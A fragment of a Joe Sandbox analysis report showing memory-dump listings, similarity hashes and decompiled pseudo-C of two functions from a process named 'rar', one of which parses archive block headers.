                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: %s%s $B2
                                                                                                            • API String ID: 0-276864071
                                                                                                            • Opcode ID: cea481aab3728d8f82339bff2069a15e612fce3e466754e3fe837e18d139d5b8
                                                                                                            • Instruction ID: 1088be8f064a8ad247ebfdd74785d4936c6583873e04cae7bb946b8dfb0e6a55
                                                                                                            • Opcode Fuzzy Hash: cea481aab3728d8f82339bff2069a15e612fce3e466754e3fe837e18d139d5b8
                                                                                                            • Instruction Fuzzy Hash: 5BC28122A08AC7A6EB30DF35D4802EE67A1FB46784F584035DA4FA7B95DF3AE551C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B78550 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B78550(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _t15;
				signed long long _t16;
				void* _t24;
				signed long long _t33;

				_t15 = _t33;
				 *((long long*)(_t15 + 8)) = __rbx;
				 *((long long*)(_t15 + 0x10)) = __rbp;
				 *((long long*)(_t15 + 0x18)) = __rsi;
				 *((long long*)(_t15 + 0x20)) = __rdi;
				_t16 = _t15 | 0xffffffff;
				_t24 = _t16 + 1;
				if ( *((char*)(__rcx + _t24)) != 0) goto 0x50b78580;
				if (_t24 + __rdx - _t16 - __r8 <= 0) goto 0x50b785bb;
				return __rdx + 0xb;
			}







                                                                                                            0x7ff650b78550
                                                                                                            0x7ff650b78553
                                                                                                            0x7ff650b78557
                                                                                                            0x7ff650b7855b
                                                                                                            0x7ff650b7855f
                                                                                                            0x7ff650b7856d
                                                                                                            0x7ff650b78580
                                                                                                            0x7ff650b78587
                                                                                                            0x7ff650b78597
                                                                                                            0x7ff650b785ba

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .
                                                                                                            • API String ID: 0-248832578
                                                                                                            • Opcode ID: 5f23eb15981641ad03e41953f5f59a7f3d4fbc27277401dd964a18faf0dd6c43
                                                                                                            • Instruction ID: 62f5db50112c68f562ac008f3641abc2c9695cf48812d8b2d0e8d439eafbf070
                                                                                                            • Opcode Fuzzy Hash: 5f23eb15981641ad03e41953f5f59a7f3d4fbc27277401dd964a18faf0dd6c43
                                                                                                            • Instruction Fuzzy Hash: 7D314D21F1468255F7209B32D8447B96A91BB56BE4F1C8335EE6E57BC5CE3DE5018300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1CD84 Relevance: 3.4, Strings: 2, Instructions: 854COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E00007FF67FF650B1CD84(void* __ecx, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi) {
				void* __rbp;
				unsigned int _t343;
				void* _t349;
				signed short _t368;
				signed short _t369;
				signed short _t379;
				signed int _t397;
				signed int _t412;
				signed int _t414;
				signed int _t428;
				unsigned int _t437;
				signed short _t455;
				signed int _t462;
				signed short _t466;
				intOrPtr _t473;
				signed int _t490;
				void* _t493;
				void* _t498;
				signed int _t499;
				signed int _t503;
				void* _t509;
				signed char _t530;
				signed int _t540;
				signed int _t541;
				long long _t545;
				signed int _t561;
				unsigned int _t565;
				unsigned int _t569;
				signed int _t572;
				void* _t586;
				void* _t597;
				void* _t598;
				void* _t603;
				signed int _t607;
				signed int _t609;
				void* _t621;
				void* _t634;
				signed int _t655;
				void* _t674;
				signed long long _t675;
				long long _t681;
				signed long long _t682;
				long long _t688;
				long long _t698;
				intOrPtr* _t699;
				void* _t700;
				intOrPtr* _t717;
				void* _t732;
				signed long long _t759;
				signed long long _t764;
				void* _t766;
				void* _t767;
				intOrPtr _t788;
				void* _t804;
				void* _t808;
				intOrPtr _t825;
				intOrPtr* _t830;
				long long _t832;
				void* _t833;
				intOrPtr* _t834;
				void* _t838;
				void* _t839;
				void* _t841;
				signed long long _t842;
				void* _t844;
				void* _t855;
				void* _t856;
				long long _t858;
				void* _t860;
				intOrPtr* _t861;
				signed int _t864;
				long long _t865;
				void* _t867;
				intOrPtr* _t868;

				_t832 = __rsi;
				_t509 = __ecx;
				_t674 = _t841;
				 *((long long*)(_t674 + 0x10)) = __rbx;
				 *((long long*)(_t674 + 0x18)) = __rsi;
				 *((long long*)(_t674 + 0x20)) = __rdi;
				_t839 = _t674 - 0x2038;
				E00007FF67FF650B69CB0(0x2110, _t674, _t855, _t856);
				_t842 = _t841 - _t674;
				_t675 =  *0x50b978f0; // 0x27db226282f1
				 *(_t839 + 0x2000) = _t675 ^ _t842;
				_t830 = __rcx;
				E00007FF67FF650B48A20(_t675 ^ _t842, _t842 + 0x60, __rcx);
				_t7 = _t832 - 6; // 0x1
				r13d = _t7;
				r12d = 0;
				if ( *((intOrPtr*)(__rcx + 0x7f84)) == r12b) goto 0x50b1ce8c;
				if ( *((intOrPtr*)(__rcx + 0x7f68)) -  *((intOrPtr*)(__rcx + 0x7f88)) + __rsi <= 0) goto 0x50b1ce8c;
				 *(_t842 + 0x50) = r13b;
				E00007FF67FF650B1E950(__rcx);
				_t12 = _t832 + 1; // 0x8
				r8d = _t12;
				_t804 = _t839 - 8;
				if ( *0x50b80550() == 8) goto 0x50b1ce46;
				E00007FF67FF650B1EBA0( *((intOrPtr*)( *_t830 + 0x18)), _t830);
				E00007FF67FF650B11534(_t842 + 0x60);
				goto 0x50b1dbb7;
				_t698 = _t830 + 0x1040;
				 *((long long*)(_t842 + 0x40)) = _t858;
				 *((long long*)(_t842 + 0x38)) = _t858;
				 *(_t842 + 0x30) = r12d;
				 *((long long*)(_t842 + 0x28)) = _t858;
				_t681 = _t839 - 8;
				 *((long long*)(_t842 + 0x20)) = _t681;
				_t24 = _t804 + 4; // 0x4
				r8d = _t24;
				E00007FF67FF650B28FF0(0, _t698, _t698,  *((intOrPtr*)(_t830 + 0x22d8)) + 0x6030);
				 *((long long*)(_t839 - 0x60)) = _t698;
				goto 0x50b1ce91;
				 *(_t842 + 0x50) = r12b;
				E00007FF67FF650B48D0C(_t498, _t509, _t597, _t698, _t842 + 0x60, __rsi, _t830, __rsi, _t839, _t844, _t867, _t864);
				if ( *((intOrPtr*)(_t839 - 0x70)) == _t858) goto 0x50b1ce2c;
				 *(_t830 + 0x347c) = E00007FF67FF650B48A64(_t842 + 0x60) & 0x0000ffff;
				 *(_t830 + 0x348c) = r12b;
				_t499 = E00007FF67FF650B48A48(_t842 + 0x60) & 0x000000ff;
				_t343 = E00007FF67FF650B48A64(_t842 + 0x60) & 0x0000ffff;
				 *(_t830 + 0x3484) = _t343;
				 *(_t830 + 0x348c) = _t343 >> 0x0000000e & r13b;
				_t561 = E00007FF67FF650B48A64(_t842 + 0x60) & 0x0000ffff;
				 *(_t830 + 0x3488) = _t561;
				 *(_t830 + 0x3480) = _t499;
				_t603 = _t561 - 7;
				if (_t603 >= 0) goto 0x50b1cf14;
				E00007FF67FF650B1C1E8(_t603, _t830);
				goto 0x50b1ce35;
				_t39 = _t681 - 1; // 0x5
				r9d = _t39;
				_t40 = _t681 - 3; // 0x3
				r8d = _t40;
				_t41 = _t681 - 4; // 0x2
				r15d = _t41;
				if (_t603 == 0) goto 0x50b1cf5e;
				if (_t603 == 0) goto 0x50b1cf52;
				if (_t603 == 0) goto 0x50b1cf46;
				if (_t499 - 0x73 - r13d - 6 != r13d) goto 0x50b1cf68;
				 *(_t830 + 0x3480) = r9d;
				goto 0x50b1cf68;
				 *(_t830 + 0x3480) = r8d;
				goto 0x50b1cf68;
				 *(_t830 + 0x3480) = r15d;
				goto 0x50b1cf68;
				 *(_t830 + 0x3480) = r13d;
				_t503 = r13d;
				 *(_t830 + 0x22ec) = _t503;
				if (_t503 == 0x75) goto 0x50b1cf81;
				if (_t503 != r13d) goto 0x50b1cf86;
				_t607 =  *(_t830 + 0x3484) & r15b;
				if (_t607 == 0) goto 0x50b1cf86;
				goto 0x50b1cf89;
				_t349 = E00007FF67FF650B48D0C(_t503, _t499 - 0x73 - r13d - 6, _t597, _t698, _t842 + 0x60, _t681, _t830, _t832, _t839, _t844, _t860, _t858);
				_t717 = _t830;
				E00007FF67FF650B18DA0(_t349,  *(_t830 + 0x3488), _t717, _t681);
				 *((long long*)(_t830 + 0x7f70)) = _t717 +  *((intOrPtr*)(_t830 + 0x7f68));
				r14d =  *(_t830 + 0x3480);
				 *(_t839 - 8) = r14d;
				if (_t607 == 0) goto 0x50b1d9ff;
				if (_t607 == 0) goto 0x50b1d3fe;
				if (_t607 == 0) goto 0x50b1d3fe;
				if (_t607 == 0) goto 0x50b1d369;
				if (_t607 == 0) goto 0x50b1d308;
				if (_t607 == 0) goto 0x50b1d09f;
				if (r14d - r13d - r13d - r13d - r15d - 0x70 - r15d == r13d) goto 0x50b1d022;
				_t609 =  *(_t830 + 0x3484) & 0x00008000;
				if (_t609 == 0) goto 0x50b1dae2;
				E00007FF67FF650B48A9C(_t842 + 0x60);
				 *((intOrPtr*)(_t830 + 0x7f70)) =  *((intOrPtr*)(_t830 + 0x7f70)) + _t681;
				goto 0x50b1dae2;
				asm("movups xmm0, [edi+0x347c]");
				asm("movups [edi+0x7bc4], xmm0");
				 *(_t830 + 0x7bd4) =  *(_t830 + 0x348c);
				 *((intOrPtr*)(_t830 + 0x7bd8)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				 *((char*)(_t830 + 0x7bdc)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *((short*)(_t830 + 0x7bde)) = E00007FF67FF650B48A64(_t842 + 0x60);
				 *((intOrPtr*)(_t830 + 0x7be0)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				r8d = 8;
				E00007FF67FF650B48B14(_t698, _t842 + 0x60, _t830 + 0x7be4, _t832, _t839, _t844);
				goto 0x50b1d016;
				asm("movups xmm0, [edi+0x347c]");
				asm("movups [edi+0x5860], xmm0");
				 *(_t830 + 0x5870) =  *(_t830 + 0x348c);
				 *((intOrPtr*)(_t830 + 0x5874)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				 *((intOrPtr*)(_t830 + 0x7f70)) =  *((intOrPtr*)(_t830 + 0x7f70)) + _t681;
				 *(_t830 + 0x5878) = E00007FF67FF650B48A64(_t842 + 0x60);
				 *((char*)(_t830 + 0x587a)) = E00007FF67FF650B48A48(_t842 + 0x60);
				if (_t609 == 0) goto 0x50b1d23f;
				if (_t609 == 0) goto 0x50b1d1d0;
				if (( *(_t830 + 0x5878) & 0x0000ffff) - 0xfe != r13d) goto 0x50b1dae2;
				asm("movups xmm0, [edi+0x5860]");
				asm("movups [edi+0x7e34], xmm0");
				asm("movsd xmm1, [edi+0x5870]");
				asm("movsd [edi+0x7e44], xmm1");
				 *(_t830 + 0x7e4c) =  *(_t830 + 0x5878);
				 *((intOrPtr*)(_t830 + 0x7e50)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				 *((char*)(_t830 + 0x7e54)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *((char*)(_t830 + 0x7e55)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *((intOrPtr*)(_t830 + 0x7e58)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				_t732 = _t842 + 0x60;
				_t368 = E00007FF67FF650B48A64(_t732);
				 *(_t830 + 0x7e5c) = _t368;
				if (_t368 - 0x104 < 0) goto 0x50b1d1a7;
				_t98 = _t732 - 1; // 0x103
				_t369 = _t98;
				 *(_t830 + 0x7e5c) = _t369;
				r8d = _t369 & 0x0000ffff;
				_t808 = _t830 + 0x7e5e;
				E00007FF67FF650B48B14(_t698, _t842 + 0x60, _t808, _t832, _t839, _t844);
				 *(_t681 + _t830 + 0x7e5e) = r12b;
				goto 0x50b1dae2;
				asm("movups xmm0, [edi+0x5860]");
				asm("movups [edi+0x7e0c], xmm0");
				asm("movsd xmm1, [edi+0x5870]");
				asm("movsd [edi+0x7e1c], xmm1");
				 *(_t830 + 0x7e24) =  *(_t830 + 0x5878);
				 *((intOrPtr*)(_t830 + 0x7e28)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				 *((char*)(_t830 + 0x7e2c)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *((char*)(_t830 + 0x7e2d)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *((intOrPtr*)(_t830 + 0x7e30)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				goto 0x50b1dae2;
				asm("movups xmm0, [edi+0x5860]");
				asm("movups [edi+0x7bec], xmm0");
				asm("movsd xmm1, [edi+0x5870]");
				asm("movsd [edi+0x7bfc], xmm1");
				 *(_t830 + 0x7c04) =  *(_t830 + 0x5878);
				 *(_t830 + 0x7c08) = E00007FF67FF650B48A64(_t842 + 0x60);
				_t379 = E00007FF67FF650B48A64(_t842 + 0x60);
				 *(_t830 + 0x7c0a) = _t379;
				_t122 = _t808 + 1; // 0x100
				r8d = _t122;
				if (( *(_t830 + 0x7c08) & 0x0000ffff) - r8w < 0) goto 0x50b1d2aa;
				 *(_t830 + 0x7c08) = 0xff;
				if (_t379 - r8w < 0) goto 0x50b1d2b7;
				 *(_t830 + 0x7c0a) = 0xff;
				r8d = 0xff;
				E00007FF67FF650B48B14(_t698, _t842 + 0x60, _t830 + 0x7c0c, _t832, _t839, _t844);
				r8d =  *(_t830 + 0x7c0a) & 0x0000ffff;
				E00007FF67FF650B48B14(_t698, _t842 + 0x60, _t830 + 0x7d0c, _t832, _t839, _t844);
				 *(_t681 + _t830 + 0x7c0c) = r12b;
				 *(_t681 + _t830 + 0x7d0c) = r12b;
				goto 0x50b1dae2;
				asm("movups xmm0, [edi+0x347c]");
				asm("movups [edi+0x7ba8], xmm0");
				 *(_t830 + 0x7bb8) =  *(_t830 + 0x348c);
				 *((short*)(_t830 + 0x7bbc)) = E00007FF67FF650B48A64(_t842 + 0x60);
				 *((char*)(_t830 + 0x7bbe)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *((char*)(_t830 + 0x7bbf)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *((short*)(_t830 + 0x7bc0)) = E00007FF67FF650B48A64(_t842 + 0x60);
				goto 0x50b1dae2;
				asm("movups xmm0, [edi+0x347c]");
				asm("movups [edi+0x5840], xmm0");
				 *(_t830 + 0x5850) =  *(_t830 + 0x348c);
				 *(_t830 + 0x585c) =  *(_t830 + 0x5848) & r13b;
				_t565 =  *(_t830 + 0x5848);
				_t530 = _t565 >> 0x00000001 & r13b;
				 *(_t830 + 0x585d) = _t530;
				 *(_t830 + 0x585e) = _t565 >> 0x00000002 & r13b;
				 *(_t830 + 0x585f) = _t565 >> 0x00000003 & r13b;
				if (_t530 == 0) goto 0x50b1d3d3;
				 *((intOrPtr*)(_t830 + 0x5854)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				if ( *(_t830 + 0x585f) == r12b) goto 0x50b1dae2;
				_t397 = E00007FF67FF650B48A64(_t842 + 0x60) & 0x0000ffff;
				 *(_t830 + 0x5858) = _t397;
				 *(_t830 + 0x7fa4) = _t397;
				goto 0x50b1dae2;
				_t505 =  ==  ? 0x3518 : 0x5880;
				_t699 = _t698 + _t830;
				E00007FF67FF650B36990(_t699, _t699, _t830 + 0x7d0c, _t832, _t844);
				asm("movups xmm0, [edi+0x347c]");
				asm("movups [ebx], xmm0");
				 *(_t699 + 0x10) =  *(_t830 + 0x348c);
				 *(_t699 + 0x10a8) =  *(_t699 + 8) & r13b;
				_t569 =  *(_t699 + 8);
				 *(_t699 + 0x10a9) = _t569 >> 0x00000001 & r13b;
				 *(_t699 + 0x10ab) = _t569 >> 0x00000002 & r13b;
				 *(_t699 + 0x10b0) = _t569 >> 0x0000000a & r13b;
				_t412 = _t569 & 0x00000010;
				if (r14d != r15d) goto 0x50b1d477;
				if (_t412 != 0) goto 0x50b1d47a;
				 *((char*)(_t699 + 0x1100)) = r12b;
				if (r14d == r15d) goto 0x50b1d48c;
				if (_t412 != 0) goto 0x50b1d48f;
				_t414 = r12b;
				 *(_t699 + 0x1112) = _t414;
				r8d = 0xe0;
				_t621 = (_t569 & r8d) - r8d;
				 *((char*)(_t699 + 0x1101)) = _t414 & 0xffffff00 | _t621 == 0x00000000;
				if (_t621 != 0) goto 0x50b1d4b3;
				r8d = r12d;
				goto 0x50b1d4c3;
				r8d = 0x10000;
				r8d = r8d << (_t569 >> 0x00000005 & 0x00000007);
				_t682 = r8d;
				 *(_t699 + 0x1108) = _t682;
				 *(_t699 + 0x1102) = _t569 >> 0x00000003 & r13b;
				 *(_t699 + 0x1103) = _t569 >> 0x0000000b & r13b;
				 *((intOrPtr*)(_t699 + 0x14)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				r15d = E00007FF67FF650B48A9C(_t842 + 0x60);
				 *((char*)(_t699 + 0x18)) = E00007FF67FF650B48A48(_t842 + 0x60);
				 *(_t699 + 0x1080) = 2;
				 *((intOrPtr*)(_t699 + 0x1084)) = E00007FF67FF650B48A9C(_t842 + 0x60);
				r13d = E00007FF67FF650B48A9C(_t842 + 0x60);
				 *(_t699 + 0x1c) = E00007FF67FF650B48A48(_t842 + 0x60) & 0x000000ff;
				 *((char*)(_t699 + 0x20)) = E00007FF67FF650B48A48(_t842 + 0x60) - 0x30;
				r12d = E00007FF67FF650B48A64(_t842 + 0x60) & 0x0000ffff;
				_t428 = E00007FF67FF650B48A9C(_t842 + 0x60);
				_t572 = _t428;
				 *(_t699 + 0x24) = _t428;
				_t540 =  *(_t699 + 0x1c);
				if (_t540 - 0x14 >= 0) goto 0x50b1d586;
				if ((_t572 & 0x00000010) == 0) goto 0x50b1d586;
				 *((char*)(_t699 + 0x1101)) = 1;
				r9d = 0;
				 *(_t699 + 0x10ac) = r9d;
				if ( *(_t699 + 0x10ab) == r9b) goto 0x50b1d5d7;
				if (_t540 == 0xd) goto 0x50b1d5cd;
				if (_t540 == 0xf) goto 0x50b1d5c5;
				if (_t540 == 0x14) goto 0x50b1d5b9;
				if (_t540 == 0x1a) goto 0x50b1d5b9;
				 *(_t699 + 0x10ac) = 4;
				goto 0x50b1d5d7;
				 *(_t699 + 0x10ac) = 3;
				goto 0x50b1d5d7;
				 *(_t699 + 0x10ac) = 2;
				goto 0x50b1d5d7;
				 *(_t699 + 0x10ac) = 1;
				 *(_t699 + 0x1114) = 2;
				if (( *((intOrPtr*)(_t699 + 0x18)) - 0x00000003 & 0x000000fd) == 0) goto 0x50b1d5f5;
				if ( *((char*)(_t699 + 0x18)) - 6 >= 0) goto 0x50b1d5ff;
				 *(_t699 + 0x1114) = r9d;
				goto 0x50b1d5ff;
				 *(_t699 + 0x1114) = 1;
				 *(_t699 + 0x1118) = r9d;
				if ( *((char*)(_t699 + 0x18)) != 3) goto 0x50b1d62c;
				if ((_t572 & 0x0000f000) != 0xa000) goto 0x50b1d62c;
				 *(_t699 + 0x1118) = 1;
				 *((intOrPtr*)(_t699 + 0x111c)) = r9w;
				if (r14d == 2) goto 0x50b1d639;
				_t634 =  *(_t699 + 0x24) - r9d;
				if (_t634 < 0) goto 0x50b1d63c;
				 *((char*)(_t699 + 0x1110)) = r9b;
				 *(_t699 + 0x1111) =  *(_t699 + 8) >> 0x00000008 & 0x00000001;
				if (_t634 == 0) goto 0x50b1d683;
				E00007FF67FF650B48A9C(_t842 + 0x60);
				_t759 = _t842 + 0x60;
				_t437 = E00007FF67FF650B48A9C(_t759);
				r8d = _t437;
				_t541 = _t540 | 0xffffffff;
				if (r15d != _t541) goto 0x50b1d67b;
				if (_t437 != _t541) goto 0x50b1d67b;
				goto 0x50b1d692;
				r9d = 0;
				goto 0x50b1d692;
				r8d = r9d;
				 *((char*)(_t699 + 0x10aa)) = r9b & 0xffffff00 | r15d == (_t541 | 0xffffffff);
				 *((long long*)(_t699 + 0x1068)) = (_t759 << 0x20) + _t682;
				_t685 =  !=  ? 0x7fffffff : (_t682 << 0x20) + _t867;
				 *((long long*)(_t699 + 0x1070)) =  !=  ? 0x7fffffff : (_t682 << 0x20) + _t867;
				_t833 =  <  ? _t858 : _t832;
				E00007FF67FF650B48B14(_t699, _t842 + 0x60, _t839, _t833, _t839, _t833);
				if (_t833 - 0x2000 >= 0) goto 0x50b1dbe7;
				 *((char*)(_t839 + _t833)) = 0;
				_t227 = _t699 + 0x28; // 0x58a8
				_t868 = _t227;
				if (r14d != 2) goto 0x50b1d7a6;
				r12d = 0;
				 *_t868 = r12w;
				r14d = 0x800;
				if (( *(_t699 + 8) & 0x00000200) == 0) goto 0x50b1d76d;
				_t764 = _t839 - 0x28;
				E00007FF67FF650B2C2F0( !=  ? 0x7fffffff : (_t682 << 0x20) + _t867, _t764);
				_t766 = (_t764 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t839 + _t766)) != r12b) goto 0x50b1d730;
				_t767 = _t766 + 1;
				if (_t833 - _t767 <= 0) goto 0x50b1d76d;
				_t688 = _t833 - _t767;
				 *(_t842 + 0x30) = _t864;
				 *((long long*)(_t842 + 0x28)) = _t868;
				 *((long long*)(_t842 + 0x20)) = _t688;
				E00007FF67FF650B2C338(_t699, _t839 - 0x28, _t839, _t833, _t839 + _t767, _t855);
				if ( *_t868 != r12w) goto 0x50b1d788;
				r9d = 1;
				E00007FF67FF650B59B10(r9d, _t586, _t598, _t699, _t839, _t868, _t833, _t839, _t864);
				E00007FF67FF650B1C2E4(_t699, _t830, _t868);
				E00007FF67FF650B1C23C(_t699, _t830, _t699);
				r14d = 0;
				goto 0x50b1d827;
				r8d = 0x800;
				E00007FF67FF650B5D098( ==  ? 0x3518 : 0x5880, _t699, _t839, _t868, _t833, _t864, _t838);
				_t545 =  ==  ?  *((intOrPtr*)(_t699 + 0xc)) - r12d + 0xffffffe0 : _t688 - 8;
				r14d = 0;
				if (_t545 <= 0) goto 0x50b1d80d;
				_t865 = _t545;
				_t242 = _t699 + 0x1028; // 0x68a8
				_t834 = _t242;
				if (_t865 -  *((intOrPtr*)(_t834 + 0x10)) <= 0) goto 0x50b1d7f6;
				E00007FF67FF650B11754(_t699, _t834, _t865 -  *((intOrPtr*)(_t834 + 8)), _t834);
				goto 0x50b1d7fa;
				 *((long long*)(_t834 + 8)) = _t865;
				E00007FF67FF650B48B14(_t699, _t842 + 0x60,  *_t834, _t834, _t839, _t865);
				r14d = 0;
				if (E00007FF67FF650B719B4(_t865 -  *((intOrPtr*)(_t834 + 0x10)), _t868, 0x50b80ea0) != 0) goto 0x50b1d827;
				 *((char*)(_t830 + 0x7f7e)) = 1;
				if (( *(_t699 + 8) & 0x00000400) == 0) goto 0x50b1d847;
				_t251 = _t699 + 0x10b1; // 0x6931
				r8d = 8;
				E00007FF67FF650B48B14(_t699, _t842 + 0x60, _t251, _t834, _t839, _t865);
				E00007FF67FF650B5BA28(r13d);
				if (( *(_t699 + 8) & 0x00001000) == 0) goto 0x50b1d958;
				_t455 = E00007FF67FF650B48A64(_t842 + 0x60);
				 *((long long*)(_t839 - 0x28)) = _t830 + 0x4568;
				 *((long long*)(_t839 - 0x20)) = _t830 + 0x4570;
				 *((long long*)(_t839 - 0x18)) = _t830 + 0x4578;
				 *((long long*)(_t839 - 0x10)) = _t865;
				r12d = r14d;
				r15d = _t455 & 0x0000ffff;
				_t861 = _t839 - 0x28;
				if ((sil & 0x00000008) == 0) goto 0x50b1d943;
				if ( *_t861 == _t865) goto 0x50b1d943;
				if (r12d == 0) goto 0x50b1d8db;
				E00007FF67FF650B5B5A8(E00007FF67FF650B5BA28(E00007FF67FF650B48A9C(_t842 + 0x60)), r12d, _t699,  *_t861, _t839 - 0x50, _t830, _t834);
				_t655 = sil & 0x00000004;
				if (_t655 == 0) goto 0x50b1d8f1;
				 *((intOrPtr*)(_t839 - 0x3c)) =  *((intOrPtr*)(_t839 - 0x3c)) + 1;
				 *(_t839 - 0x38) = r14d;
				if (_t655 <= 0) goto 0x50b1d930;
				r14d = 3;
				r14d = r14d - (r15d >> 0x00000003 - r12b << 0x00000002 & 0x00000003);
				r14d = r14d << 3;
				_t462 =  *(_t839 - 0x38) | (E00007FF67FF650B48A48(_t842 + 0x60) & 0x000000ff) << r14d;
				 *(_t839 - 0x38) = _t462;
				r14d = r14d + 8;
				if (_t655 != 0) goto 0x50b1d909;
				r14d = 0;
				 *(_t839 - 0x38) = _t462 * 0x64;
				E00007FF67FF650B5BB7C(_t699,  *_t861, _t839 - 0x50);
				r12d = r12d + 1;
				_t862 = _t861 + 8;
				if (r12d - 4 < 0) goto 0x50b1d89d;
				_t280 = _t699 + 0x28; // 0x58a8
				if ( *(_t839 - 8) != 2) goto 0x50b1d969;
				E00007FF67FF650B1A8D4(_t699, _t830, _t699);
				_t788 =  *((intOrPtr*)(_t699 + 0x1068));
				_t825 =  *((intOrPtr*)(_t830 + 0x7f70));
				r12d = 0;
				if (_t825 < 0) goto 0x50b1d99a;
				if (_t788 < 0) goto 0x50b1d99a;
				if (_t825 - 0xffffffff - _t788 <= 0) goto 0x50b1d99d;
				 *((long long*)(_t830 + 0x7f70)) = _t858;
				_t466 = E00007FF67FF650B48B90(r14d,  *(_t699 + 0x1102), _t842 + 0x60);
				r13d = 1;
				if ( *_t699 == (_t466 & 0x0000ffff)) goto 0x50b1dadd;
				 *(_t830 + 0x7f90) = r13b;
				E00007FF67FF650B2CC24(_t466 & 0x0000ffff, r13d,  *_t699 - (_t466 & 0x0000ffff), 0x50ba7ab8);
				r14b =  *(_t842 + 0x50);
				if (r14b != 0) goto 0x50b1d9f5;
				_t291 = _t862 + 0x1b; // 0x1b
				E00007FF67FF650B112C8(_t291, _t830 + 0x3a, _t280);
				goto 0x50b1dae7;
				_t700 = _t830 + 0x34a0;
				E00007FF67FF650B36A38(_t858, _t700);
				asm("movups xmm0, [edi+0x347c]");
				asm("movups [ebx], xmm0");
				 *(_t700 + 0x10) =  *(_t830 + 0x348c);
				 *((short*)(_t830 + 0x34b4)) = E00007FF67FF650B48A64(_t842 + 0x60);
				_t473 = E00007FF67FF650B48A9C(_t842 + 0x60);
				 *((intOrPtr*)(_t830 + 0x34b8)) = _t473;
				 *(_t830 + 0x7f7d) =  *(_t830 + 0x34a8) & r13b;
				r8d =  *(_t830 + 0x34a8);
				 *(_t830 + 0x7f7c) = r8d >> 0x00000003 & r13b;
				 *(_t830 + 0x7f7f) = r8d >> 0x00000002 & r13b;
				 *(_t830 + 0x7f83) = r8d >> 0x00000006 & r13b;
				 *(_t830 + 0x7f84) = r8d >> 0x00000007 & r13b;
				if (_t473 != 0) goto 0x50b1daa7;
				if ( *((intOrPtr*)(_t830 + 0x34b4)) == r12w) goto 0x50b1daaa;
				 *((char*)(_t830 + 0x7f80)) = r13b;
				 *(_t830 + 0x34bc) = r8d >> 0x00000001 & r13b;
				 *(_t830 + 0x7f81) = r8d >> 0x00000008 & r13b;
				r8d = r8d >> 4;
				r8b = r8b & r13b;
				 *(_t830 + 0x7f82) = r8b;
				goto 0x50b1dae2;
				r14b =  *(_t842 + 0x50);
